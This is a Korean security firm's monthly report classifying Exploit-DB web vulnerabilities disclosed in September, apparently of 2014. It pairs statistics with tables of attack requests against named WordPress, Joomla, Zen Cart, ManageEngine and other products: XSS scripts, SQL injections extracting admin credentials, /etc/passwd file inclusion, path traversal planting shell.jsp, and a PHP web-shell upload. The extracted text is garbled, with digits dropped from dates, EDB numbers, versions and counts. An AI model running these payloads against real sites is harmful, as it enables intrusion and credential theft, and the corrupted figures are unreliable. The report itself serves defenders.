EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross Site Scripting 공격들은난이도측면에서단순한공격들임에도불구고특정소프트웨어에서다수의취약점이발견되었습니다. 해당소프트웨어를사용는관리자는업데이트를실시여 Cross Site Scripting 공격에노출되지않도록각별한주의가필요합니다, 이번달에는특히 Local File Inclusion 공격에대한취약점이많이보고되었습니다. 해당취약점들은위험도가매우높은취약점들로, 공격이성공할시서버의계정정보는물론다른중요한파일들까지노출될수있어치명적인피해를초래할수있습니다. 해당서버의관리자는사용자입력값을엄격게검증여 Local File Inlcusion 공격을차단할필요가있습니다. 주요소프트웨어취약점발생현황을보면 에서가장많은취약점이보고되었으며다음으로,, Zen Cart 순이였습니다. 앞의두개의소프트웨어는흔히사용는 CMS 이며뒤의두개는전자거래오픈솔루션으로써널리이용되고있는소프트웨어입니다. 네개모두사용률이높은소프트웨어로써자신의소프트웨어가해당소프트웨어중의나라면취약점에대비할수있도록주기적인취약점보안패치실시가반드시필요합니다.. 취약점별보고개수취약점 보고개수 XSS 8 SQL Injection 4 LFI 8 4 File Upload 총합계 45 0 8 4 0 8 4 0 8 4 취약점별보고개수 XSS SQL Injection LFI 8 4 File Upload. 위험도별분류 위험도 보고개수 백분율 7 0.00% 중 8 40.00% 0 0.00% 합계 45 00.00% 8 위험도별분류 7 중 3. 공격난이도별현황공격난이도 보고개수 백분율 4 8.89% 중.% 40 88.89% 총합계 45 00.00% 공격난이도별현황 4 중 40 4. 주요소프트웨어별취약점발생현황소프트웨어이름 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition Restaurant Script (PizzaInn Project) Glype Cart Engine OsClass 총합계 보고개수 9 5 3 45 3 주요소프트웨어별취약점발생현황 9 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition 5 Restaurant Script (PizzaInn Project) Glype Cart Engine ** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 3454 File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 345 Mulitple Themes - admin-ajax.php 취약점 3454 SQL Injection Huge-IT Image Gallery.0. - admin.php SQL

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 34553 SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL 34578 LFI Acento Theme - view-pdf.php LFI 취약점 34589 SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL 34589 LFI WP Support Plus Responsive Ticket System.0 Plugin - downloadattachment.php SQL 3478 SQL Injection All In One WP Security Plugin 3.8. - admin.php SQL 347 XSS 중 Login Widget With Shortcode 3..- options-general.php XSS 취약점 3457 SQL Injection Spider Calendar <= 3.. - index.php SQL 345 SQL Injection Spider Contacts.3. - index.php SQL 3437 SQL Injection Spider Form Maker <= 3.4 - index.php SQL 34755 LFI Mac Gallery.5 - index.php LFI 취약점 34754 SQL Injection Face Gallery.0 - index.php SQL 34754 LFI Face Gallery.0 - index.php LFI 취약점 3458 XSS 중 - mail.php XSS 취약점 3458 XSS 중 - newsletters.php XSS 취약점 3458 XSS 중 - banner_manager.php XSS 취약점 3458 XSS 중 - countries.php XSS 취약점 3458 XSS 중 - currencies.php XSS 취약점 3458 XSS 중 - languages.php XSS 취약점 3458 XSS 중 Zen Cart.5.3 - media_types.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - media_manager.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - music_genre.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - record_company.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - record_artists.php XSS 취약점 Zen Cart

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 POST /posnic-.0/update_details.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 PHP Stock Management System PHP Stock PHP Stock 04-09-0 34405 XSS 중.0 - update_details.php XSS 취 Management Management 약점 System System.0 sname=%3cscript%3ealert%8%9%3b%3c%fscript%3e &address=ghala+mandi&place=old+road&city=multan&pi n=&phone=033570&website=www.hashmitech.webs. com&email=umar%40gmail.com&submit=update POST /statusupdate?actiontocall=lfu&customerid=337&filena me=../../../../../../shell.jsp&configdataid= HTTP/. 04-09-0 3458 ManageEngine Desktop - /statusupdate 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 ManageEngin e Desktop ManageEngine Desktop POST /mdm/mdmloguploader?filename=..\\..\\..\webapps\\ Desktop\\shell.jsp HTTP/. 04-09-0 3458 ManageEngine Desktop - /mdmloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 ManageEngin e Desktop ManageEngine Desktop POST /agentloguploader?computername=whatever&domainna me=whatever&customerid=337&filename=..\\..\\..\\..\\webapps\\desktop\\shell.jsp HTTP/. 04-09-0 3458 ManageEngine Desktop - /agentloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 ManageEngin e Desktop ManageEngine Desktop POST http://9.8.3.8/wordpress/wpadmin/admin.php?page=slideshow- slides&method=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-0 3454 File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 --------------7dd009908f Slideshow Gallery Plugin.4. -----------------------------7dd009908f filename="backdoor.php" <?php passthru($_get['cmd']);?> -----------------------------7dd009908f-- 04-09-0 345 Mulitple Themes - admin-ajax.php 취약점 /wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php 04-09-0 3454 SQL Injection Huge-IT Image Gallery.0. - admin.php SQL /wordpress/wpadmin/admin.php?page=gallerys_huge_it_gallery&task=edit _cat&id=&removeslide=%0and%0= Huge-IT Image Gallery.0.

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-03 345 SQL Injection AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 vbulletin 4.0.x - 4.. - vbulletin 4.0.x vbulletin search.php SQL - 4.. post_id%3d%0and%0%3d%up_type%3dlike POST /mybb/usercp.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 04-09-05 34539 XSS 중 MyBB User Social Networks Plugin. - usercp.php XSS 취약점 my_post_key=a3baa4af93035458a448dda4b&bday =&bday=&bday3=&birthdayprivacy=all&website=http% MyBB MyBB User Social Networks Plugin. 3A%F%F&profile_fields%5Bfid3%5D=Undisclosed&profile _fields%5bfid%5d=&profile_fields%5bfid%5d=&icq=&ai m=&msn=&yahoo=%3e%3cscript%3ealert%8document.c ookie%9%3c%fscript%3e%3c&away=0&awayreason=& awayday=&awaymonth=&awayyear=&action=do_profile&r egsubmit=update+profile POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/. 04-09-07 34553 SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 Like Dislike Counter..3 Plugin post_id%3d%0and%0%3d%up_type%3dlike POST /register/ HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows --------------7dd009908f -----------------------------7dd009908f 04-09-07 3455 SQL Injection LoadedCommerce7 - /register/ SQL Content-Disposition: form-data; name="field_" :entry_lastname, LoadedComm erce LoadedComm erce7 -----------------------------7dd009908f Content-Disposition: form-data; name="field_",(select user_name from lc_administrators order by id asc limit ),(select user_password from lc_administrators order by id asc limit ),3,4,5,,7,8,9,0)# -----------------------------7dd009908f filename="" 04-09-08 3458 SQL Injection Mpay4 PrestaShop Payment Module.5 - confirm.php SQL /modules/mpay4/confirm.php?mpaytid=&status=bbb &TID=a%7%0or%0%7a%7%0in%0%8select%0IF %8SUBSTR%8@@version,,%9=5,BENCHMARK%80 00000,SHA%80xDEADBEEF%9%9,%0false%9%9;% 0--%3 Mpay4 Mpay4 PrestaShop Payment Module.5 /catalog/admin/mail.php?action=preview HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 04-09-08 3458 XSS 중 - mail.php XSS 취약점 customers_email_address=<script>alert()</script>&fro m=fuck@shit.up&subject=test&message=test

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 /catalog/admin/newsletters.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 - newsletters.php XSS 취약점 module=newsletter&title=<script>alert(3)</script>&cont ent=<script>alert(45)</script> /catalog/admin/banner_manager.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-08 3458 XSS 중 --------------7dd009908f - banner_manager.php XSS 취약점 -----------------------------7dd009908f Content-Disposition: form-data; name="banners_title" <script>alert();</script> -----------------------------7dd009908f filename="info.gif" <?php passthru($_get['cmd']);?> -----------------------------7dd009908f-- /catalog/admin/countries.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 - countries.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 countries_name=aaa<script>alert()</script> /catalog/admin/currencies.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 - currencies.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 title=<script>alert()</script> /catalog/admin/languages.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 - languages.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 name=<script>alert()</script>

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /create-content/gallery HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows --------------7dd009908f 04-09-08 34579 XSS 중 vbulletin 5..X - /gallery XSS 취약점 -----------------------------7dd009908f vbulletin vbulletin 5..X Content-Disposition: form-data; name="title_3" cool" onmouseover=alert() xssed=" -----------------------------7dd009908f filename="" -----------------------------7dd009908f-- GET /phpmyfaq/index.php HTTP/. 04-09-08 34580 XSS 중 phpmyfaq.8.x - index.php XSS 취약점 User-Agent: <script>alert()</script> Referer: <script>alert(3)</script> phpmyfaq phpmyfaq.8.x 04-09-08 3457 SQL Injection Spider Calendar <= 3.. - index.php SQL Injection 취약점 /joomla/index.php?option=com_spidercalendar&calendar_i d=%0and%0=-- Spider Calendar <= 3.. POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&ac tion=save HTTP/. 04-09-08 3458 XSS 중 Zen Cart.5.3 - media_types.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="type_name" <script>alert()</script> -----------------------------7dd009908f POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&ac tion=save HTTP/. 04-09-08 3458 XSS 중 Zen Cart.5.3 - media_manager.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="media_name" <script>alert()</script> -----------------------------7dd009908f

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /zen/zen-cart-v.5.3-070404/admin3/music_genre.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-08 3458 XSS 중 Zen Cart.5.3 - music_genre.php XSS 취약점 Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="music_genre_name" <script>alert()</script> -----------------------------7dd009908f POST /zen/zen-cart-v.5.3-070404/admin3/record_company.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-08 3458 XSS 중 Zen Cart.5.3 - record_company.php XSS 취약점 Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="record_company_name" <script>alert()</script> -----------------------------7dd009908f POST /zen/zen-cart-v.5.3-070404/admin3/record_artists.php?action=insert HTTP/. 04-09-08 3458 XSS 중 Zen Cart.5.3 - record_artists.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="artists_name" <script>alert()</script> -----------------------------7dd009908f 04-09-08 34578 LFI Acento Theme - view-pdf.php LFI 취약점 /wp-content/themes/acento/includes/viewpdf.php?download=&file=/etc/passwd Acento Theme POST /mail/index.php/mail/mail/listfoldermessages/searching/tru e/selectfolder/inbox./resultcontext/searchresultstab HTTP/. 04-09-08 34585 XSS 중 Atmail Webmail 7. - /mail/index.php/mail/mail/listfol dermessages/searching/true/sel ectfolder/inbox./resultcont ext/searchresultstab XSS 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 Atmail Atmail Webmail 7. searchquery=&goback=&from=&to=&subject=&body= &filter=<script>alert()</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-09 34589 SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 WP Support Plus Responsive Ticket System.0 Plugin action=openticket&ticket_id=- UNION SELECT concat_ws(0x3a,version(),database(),user()),,3,4,5,,7 * any registered user can successfully execute this request

EDB 분석보고서 (04.09) 04-09- 345 SQL Injection Spider Contacts.3. - index.php SQL /joomla/index.php?option=com_spidercontacts&contact_i d=%0and%0=&view=showcontact&lang=ca Spider Contacts.3. 04-09- 3437 SQL Injection Spider Form Maker <= 3.4 - index.php SQL /index.php?option=com_formmaker&view=formmaker&id =%0and%0= Spider Form Maker <= 3.4 04-09-0 347 SQL Injection SelectSurvey.net - ReviewReadOnlySurvey.aspx SQL /survey/reviewreadonlysurvey.aspx?responseid=<num>& SurveyID=%0and%0= SelectSurvey.n et 4.4.004 04-09-0 347 SQL Injection SelectSurvey.net - UploadImagePopupToDb.aspx SQL /survey/uploadimagepopuptodb.aspx?responseid=<num >&SurveyID=%0and%0= SelectSurvey.n et 4.4.004 04-09-3 34747 LFI 04-09-4 347 LFI 04-09-4 3470 XSS 중 04-09-4 34755 LFI 04-09-4 34754 SQL Injection 04-09-4 34754 LFI 04-09-4 34758 LFI 04-09-5 3478 SQL Injection LittleSite 0. - index.php LFI 취약 /littlesite/index.php?file=../../../../etc/passwd LittleSite LittleSite 0. 점 webedition.3.8.0 - webedition /webedition/showtempfile.php?file=../../../../etc/passwd webedition showtempfile.php LFI 취약점.3.8.0 Restaurant Script(PizzaInn Project) - register-exec.php XSS 취약점 Mac Gallery.5 - index.php LFI 취약점 Face Gallery.0 - index.php SQL Face Gallery.0 - index.php LFI 취약점 Glype.4.9 - browse.php LFI 취 약점 All In One WP Security Plugin 3.8. - admin.php SQL /PizzaInn/register-exec.php? fname=<script>alert()</script>&lname=<script>alert()</s cript>&login=<script>alert()</script>&password=r00t&cpa ssword=r00t&question=8&answer=hack4&submit=registe r /index.php?option=com_macgallery&view=download&alb umid=../../etc/passwd /index.php?option=com_facegallery&view=images&aid= %0and%0=&lang=en /index.php?option=com_facegallery&task=imagedownloa d&img_name=../../etc/passwd GET /browse.php?u=&b=8 HTTP/. Cookie: s=../security 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WP Support Plus WP Support Responsive Ticket System.0 /wp-content/plugins/wp-support-plus-responsive-ticketsystem/includes/admin/downloadattachment.php?path=/et Plus 04-09-09 34589 LFI Plugin - Responsive downloadattachment.php SQL c/passwd Ticket System.0 Plugin /wpadmin/admin.php?page=aiowpsec&tab=tab&order=,% 8select%0load_file%8CONCAT%8CHAR%89%9, CHAR%89%9,%8select%0version%8%9%9,C HAR%84%9,CHAR%897%9,CHAR%8%9,C HAR%8%9,CHAR%897%9,CHAR%899%9,C HAR%807%9,CHAR%80%9,CHAR%84% 9,CHAR%84%9,CHAR%899%9,CHAR%8% 9,CHAR%809%9,CHAR%89%9,CHAR%80% 9,CHAR%8%9,CHAR%8%9,CHAR%898 %9,CHAR%897%9,CHAR%84%9%9%9% 9 POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&ac tion=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows --------------7dd009908f Restaurant Script (PizzaInn Project) Restaurant Script (PizzaInn Project) Mac Gallery.5 Face Gallery.0 Face Gallery.0 Glype Glype.4.9 All In One WP Security Plugin 3.8. 04-09-5 3474 SQL Injection Cart Engine 3.0 - cart.php SQL -----------------------------7dd009908f Content-Disposition: form-data; name="item_id[0]" Cart Engine Cart Engine 3.0 8' AND (SELECT FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,floor(rand()*))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql -----------------------------7dd009908f filename="" 04-09-5 3473 LFI OsClass 3.4. - index.php LFI 취약점 /osclass/ocadmin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd OsClass OsClass 3.4.

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 04-09-5 347 XSS 중 Login Widget With Shortcode 3..- optionsgeneral.php XSS 취약점 POST /wp-admin/optionsgeneral.php?page=login_widget_afo HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 Login Widget With Shortcode 3.. custom_style_afo=</textarea><script>alert()</script >